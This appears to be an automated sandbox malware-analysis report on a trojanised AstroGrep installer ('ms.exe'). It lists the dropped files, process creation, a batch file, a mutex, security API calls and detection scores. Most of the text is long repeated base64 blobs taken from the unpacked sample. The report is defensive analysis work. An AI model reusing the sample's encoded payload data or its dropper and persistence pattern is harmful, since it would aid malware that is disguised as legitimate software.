1WqS5jnH5T9hkgpB7CdGaJCRnzt285c6Q3Yxq29q/w/O/2Qurw1KqcNi0qjBhE3CGmOZa/3I2DqBxV4OWMuK/3AiJ2F5ojQ5/lv7197Wwh2D5xbUgJ/LC8uVQpbeGhqdqk0a+2xhZR0XLAt7QC1QzPIAw9XorjUZ0kvRAcbpvQuVEcHEQiSk8vjduCV1X1n4dc/wRVppbPJPZvjK1Mh2Zcpzgpu9MS0vVjuu5Y4xvPvf1c6iqzCiny1TFHzmLYdc8K1wTNOoZQB2VrICC9kmng3ZtSHTR+rkuKM6or+X1sCAmuuJkjiNTowtmPDBpYXqTvV7rM1udwyAcV4pdco7151c+y+nY3s1EBhyFlLh6AET832+hhvA5YIgtBixfREJ37RPLohibVqUMOLsfWSlJePkgO+DS3hSjMukU4ikBnh4T0JEv2OZ4qZAuOHtOe42EEdbCZqhnY0ed8gY0LH7KQoPsXve4QOqCi5pz5sSN2bdtD1Pe5SRf5Q0/VDvmOm8jBhiI4F9kJxtK0uEJEqrUeYeeUck8GNsyx8WHqW6DHeMgQYSOay5tDU3QVd4nA6VePHiyAoGo1NkluauABdvACMi+1S2U2HuC2K/kpvIO78Ey4fi03DIWOdKwjAPz6HTRErqFL8GU8m8cRnBSLEFfTLsFAK3PpjoYr5p1LilKhivCm3eDI8rg7Kce9LS6XJsshf1zVjdvXbhKM8t7tS4s80MhTDXOjV5BhutYCI7cMgXZ+HSSXbv+GX2XSaZPkWHGXgVii2qDmY1HeSKyMRSs0cGf2s1S/Ai6FJBl9fRhqRyccV50Pwxghb3prrGgGNi+RFVZuKLsMCMDJNr3unwJ0A4GXx/QxjgoHld10w0sr5PlE6nxOr16yIqis1YgbnpOYyVmLpI9gD8t7NHQ3Z1lRLOv5W83gbhwqgWGQRBl9tUGW9qrkMDNf5tGxAdAJMr7+IAqJu5IsIBdleNiU3ImffMARkIL/WytZNaFjp5FTVBBnLkQy2GwuZeziqCfCBBDB1aY7fCQtZsL+KJ+XFqA4EPxUJr6OXTBtFT3xCMBE+Fy9Pme3WBIcjpair31ibEC7Vc/FOFQw8NuYqHJJRJmJ6UlncQs18i1mJJcvpVtGa8OyXfqvy9ac8aS4V9xuOiI9DekDLADJSo2duLCTWsgdFMI1IXAw6kOUzpbfStUlDntS77T24jUA+RJjyq8V+zTPRU95cl1Gwb6sXmPM8qs8NwkAsOhzOePCuRvr3RaaGTAe8RLyIindb+T/yse5WVsI=', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 13.0.astro-grep.exe.770000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 17.2.astro-grep.exe.430000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 17.0.astro-grep.exe.430000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 17.0.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 17.0.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ASTRO-GREP.EXE.1.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: ASTRO-GREP.EXE.1.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 17.2.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 17.2.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 13.2.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 13.2.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: astro-grep.exe.3.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: astro-grep.exe.3.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 13.0.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 13.0.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ICSharpCode.AvalonEdit.dll.5.drBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                            Source: ICSharpCode.AvalonEdit.dll.5.drBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                            Source: ICSharpCode.AvalonEdit.dll.5.drBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
                            Source: classification engineClassification label: mal52.troj.evad.winEXE@19/26@1/2
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040310F
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00404352 GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_00404352
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_0040205E CoCreateInstance,MultiByteToWideChar,5_2_0040205E
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A310C0 _memset,OutputDebugStringA,FindResourceA,CreateFileA,SizeofResource,LoadResource,LockResource,WriteFile,FindCloseChangeNotification,ShellExecuteA,1_2_00A310C0
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrepJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEFile created: C:\Users\user\AppData\Roaming\astro-grep.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3820:120:WilError_01
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeMutant created: \Sessions\1\BaseNamedObjects\Mutex_6SI8OkPnk
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:784:120:WilError_01
                            Source: C:\Users\user\Desktop\ms.exeFile created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                            Source: C:\Users\user\Desktop\ms.exeCommand line argument: shell32.dll1_2_00A31320
                            Source: C:\Users\user\Desktop\ms.exeCommand line argument: ShellExecuteA1_2_00A31320
                            Source: C:\Users\user\Desktop\ms.exeCommand line argument: RBIND1_2_00A31320
                            Source: ms.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: ms.exeVirustotal: Detection: 78%
                            Source: unknownProcess created: C:\Users\user\Desktop\ms.exe 'C:\Users\user\Desktop\ms.exe'
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE'
